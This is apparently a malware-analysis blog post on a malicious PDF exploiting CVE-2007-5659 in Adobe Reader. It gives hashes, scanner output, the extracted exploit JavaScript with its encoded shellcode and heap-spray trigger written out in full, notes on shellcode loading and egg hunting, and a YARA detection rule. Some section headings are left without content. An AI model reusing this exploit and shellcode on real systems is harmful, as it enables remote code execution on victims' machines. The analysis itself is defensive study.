Source: "Malware Reverse Engineering" Malware Family: PDF Shell Code Exploit Analysis Tools: PDFStreamDumper, pestudio, IDA Pro, CFF Explorer, PEID, BinText Reports: (1) Malwr: https://malwr.com/analysis/YmMzZDEwYzVhNDg4NDFmOTg0MDQxM2RjOGMyOWViZGE/ (2) VirusTotal: https://www.virustotal.com/en/file/a6bde95330c830646945f2564c5bec27802bcbb117316bdda2520a11a4dbead9/analysis/1450231420/ I.Malware Analysis: CVE-2007-5659_PDF__9BC1735453963E33EA1857CC25AA5A19_SurveyOnObama... File Type: PDF File Hashes Input MD5: 9bc1735453963e33ea1857cc25aa5a19 Input SHA256: a6bde95330c830646945f2564c5bec27802bcbb117316bdda2520a11a4dbead9 File Size: 72.2 KB (73896 bytes) Anti-Virus detection: 40 / 55 (with the exception of Malwarebytes, SuperAntiSpyware, Alibaba, AegisLab, ByteHero, Bkav) Mutexes [malwr]: CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004 Acrobat Instance Mutex ShimCacheMutex Global\AcrobatViewerIsRunning Here is the PDFFiD information provided by VirusTotal: *This PDF file contains 4 JavaScript blocks. Malicious PDF documents often contain JavaScript to exploit JavaScript vulnerabilities and/or to execute heap sprays. Please note you can also find JavaScript in PDFs without malicious intent. *This PDF file contains an automatic action to be performed when a given page of the document is viewed. Malicious PDF documents with JavaScript very often use an automatic action to launch the JavaScript without user interaction. *The combination of automatic actions and JavaScript makes this PDF document suspicious. *This PDF document has an invalid cross reference table. *This PDF document contains 4 object streams. A stream object is just a sequence of bytes and very often is only used to store images and page descriptions, however, since it is not limited in length many attackers use these artifacts in conjunction with filters to obfuscate other objects. *This PDF document has 4 pages, please note that most malicious PDFs have only one page. *This PDF document has 52 object start declarations and 52 object end declarations. *This PDF document has 16 stream object start declarations and 16 stream object end declarations. *This PDF document has a cross reference table (xref). *This PDF document has a pointer to the cross reference table (startxref). *This PDF document has a trailer dictionary containing entries allowing the cross reference table, and thus the file objects, to be read. The malware contains the following exploit CVE-2007-5659 [source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659] “Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.” Here is the syntax of this exploit: Extracted Shellcode at 0x20ED-0x2533 function re(count,what) { var v = ""; while (--count >= 0) v += what; return v; } function sopen() { sc = unescape("%uc933%ub966%u017c%u1beb%u565e%ufe8b%u66ac%u612d%u6600%ue0c1%u6604%ud08b%u2cac%u6661%uc203%u49aa%uea75%ue8c3%uffe0%uffff%u6666%u6c59%u6d5f%u6459%u6d5f%u6d66%u6466%u6766%u6866%u685d%u6665%u6160%u6262%u6161%u6161%u6161%u6a5f%u6f62%u6261%u6161%u6161%u7059%u6665%u6d60%u6567%u625b%u6164%u6161%u6161%u6161%u6c59%u6165%u6d61%u6c59%u6168%u6d62%u6e5b%u6c59%u6966%u6961%u6a59%u6e66%u6d5f%u6c59%u6e65%u6160%u6c59%u6e68%u6d60%u6266%u6c59%u6665%u6d5f%u6c59%u6168%u6d64%u6c59%u6568%u6761%u6968%u6461%u6160%u6766%u6c59%u6768%u6163%u6461%u6160%u6464%u6a5d%u6a65%u6265%u6e5b%u6461%u6665%u6d5f%u6464%u6c5e%u7061%u6f5c%u6162%u6b64%u675e%u6568%u6961%u625d%u6c5d%u6e61%u6461%u6b5e%u6165%u6c5f%u6260%u6c64%u7062%u6668%u675f%u6f66%u6c59%u6f66%u6563%u6461%u6e66%u6d5f%u6767%u6c59%u6d61%u6c65%u6c59%u6f66%u6d62%u6461%u6e66%u6d5f%u6c59%u6561%u6c59%u6461%u6665%u6d5f%u6c5b%u6a66%u635f%u665c%u6464%u615d%u6a59%u6665%u695f%u6a59%u6665%u655f%u6459%u6665%u655f%u6561%u6b67%u6161%u6c59%u6665%u655f%u6166%u6c59%u6e65%u6d60%u7060%u6266%u6162%u6a59%u6665%u6560%u6459%u6e68%u6560%u7060%u6568%u6e67%u6259%u6e68%u6560%u6161%u6163%u6161%u6161%u6e68%u6361%u6c5f%u6367%u6b67%u6165%u6967%u6161%u6162%u6161%u6161%u6c59%u6666%u6560%u6366%u6b67%u6161%u6c59%u6665%u6d60%u7060%u6166%u6564%u6a59%u6665%u6960%u6b67%u6161%u6b67%u6161%u6b67%u6161%u6c59%u6e65%u655f%u6266%u6c59%u6666%u6d60%u7060%u6366%u6164%u6b67%u6161%u6e59%u6665%u695f%u6166%u6c59%u6e65%u6560%u6266%u6c59%u6666%u6960%u6366%u6c59%u6665%u655f%u6166%u6c59%u6e65%u6d60%u7060%u6266%u6d63%u6c59%u6666%u6960%u6461%u6666%u6560%u6259%u6b68%u6d60%u6667%u7067%u6767%u6b61%u6668%u6361%u6c5f%u6163%u6967%u6161%u6159%u6161%u6161%u6c59%u6665%u6560%u6166%u6c59%u6e65%u6960%u6266%u6c59%u6666%u6d60%u7060%u6366%u6964%u695c%u6261%u6161%u6161%u6161%u6659%u615d%u7061%u6659%u6e67%u7060%u7060%u7060%u6c59%u6668%u6960%u6464%u6a5d%u6265%u6259%u6d64%u6f61%u6667%u7067%u6767%u6b61%u6668%u6760%u6459%u625d%u6561%u6461%u6260%u7060%u6668%u6d60%u7060%u6668%u655f%u7060%u675e%u695f%u6e5e%u6f60%u7060%u7060%u6c60%u685a%u6e60%u7061%u665b%u6862%u6161%u6d68%u6368%u6f60%u645c%u6762%u6f68%u695e%u635f%u6468%u6e5b%u6c5a%u6e68%u705e%u6768%u6e67%u615c%u6665%u6964%u6363%u6d5b%u685f%u6464%u6b5d%u6b59%u6c66%u6f59%u6f65%u6f61%u6d5f%u6b60%u685a%u6361%u6d65%u6760%u6b5f%u6b5c%u6d66%u6762%u6667%u6b60%u6162%u6d5b%u6961%u6b5e%u6768%u6566%u6b5d%u705b%u625a%u6d5b%u6464%u6761%u6461%u695a%u6f60%u6b59%u6f61%u7062%u6a68%u6b61%u695f"); if (app.viewerVersion >= 7.0) { plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%uFCFC%uFCFC") + re(120,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%uFCFC%uFCFC") + sc + re(1256,unescape("%u6161%u6161")); } else { ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019"); plin = re(80,unescape("%uFCFC%uFCFC")) + sc + re(80,unescape("%uFCFC%uFCFC"))+ unescape("%u17e9%ufffb")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb"); while ((plin.length % 8) != 0) plin = unescape("%u6161") + plin; plin += re(2626,ef6); } if (app.viewerVersion >= 6.0) { this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin}); } } var shaft = app.setTimeOut("sopen()",1200); Wiki Information: Shellcode is a small segment of code that is often used by software exploits as payload. Shellcode:
Purpose
Extraction Chapter 19 from Practical Malware Analysis provides a detailed explanation of typical shellcode techniques and provides a helpful debugging utility. It also provides suggestions for how to identify shellcode blobs (pp423-424). However, it does not describe how to extract the shellcode from the various containers, so we will show you here. This one topic could be a whole course itself (which gives me an idea!), so we will only be looking at Javascript-in-a-PDF for the example and for the lab. We will extract shellcode from CVE-2007-5659_PDF__9BC1735453963E33EA1857CC25AA5A19_SurveyOnObamapdf.pdf= using the following process:
Analysis When analyzing the shellcode itself, it helps to know a basic loading technique that relies on the fact that kernel32.dll is always loaded into the memory space of an MS-Windows process. The shellcode must find kernel32.dll in memory and then identify the locations of any API calls it wants to use from the DLL. LoadLibraryA can be used to then load additional DLLs and access other APIs. This is explained quite well in Practical Malware Analysis, so if you have the book, refer to Figure 19-1 on p414 and Listing 19-6 on p419. Egg Hunt Shellcode sometimes needs to drop additional malware on the system. To do this, it will either download the additional malware, or it will decode the additional drop file(s) from the initial infection vector, i.e. the PDF or DOC. If the additional files are embedded in the same file that the shellcode was embedded, then the shellcode will need to find the additional file(s) somehow. This search for additional embedded malicious object(s) is called the Egg Hunt. There are various techniques to an Egg Hunt, but the most common is to obtain an open handle to the file on disk or to the memory space of the process that has already loaded the file. The shellcode then searches for a unique byte sequence that identifies the start of the additional embedded malicious object(s). Often this is a four-byte sequence, which is easier to include in minimalist shellcode and often unique enough for a single file or process' memory. Shellcode Summary
Yara Signature: rule Win32_ShellCode_Obama : Exploit { meta: author = "Vitali Kremez" date = "2015-12-16" description = "Detects PDF ShellCode Obama Exploit" hash0 = "9bc1735453963e33ea1857cc25aa5a19" sample_filetype = "pdf" strings: $string0 = "11 0 obj<</Outline/Span/Underline/Span/Strikeout/Span/" $string1 = "]DBKV>" $string2 = "[P8--." $string3 = "qHZz>).%$" $string4 = "UXVUT[ZYX_" $string5 = "0000000013 65535 f" $string6 = "'uuid:e5cc1bc4-c1bf-4074-8bfc-5b0cc9231eee'><xapMM:VersionI$ $string7 = "lrBzCzvtSgo" $string8 = "kzixgvetcrap" $string9 = "fEkMi}inlh" $string10 = "mUnmlkjihgfetegdczn" $string11 = "0000007823 00000 n" $string12 = "OCI/TOF/TOC/TOFI/TOCI/Superscript/Span/Subscript/Span/Drop$ $string13 = "./.RnX()(" $string14 = "'http://purl.org/dc/elements/1.1/' dc:format" $string15 = "0000001481 00000 n" $string16 = "RAP_N]L[JYHWFUD" $string17 = "nHVPBLBEVZ" condition: 6 of them and filesize<75KB }
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
September 2016
Categories |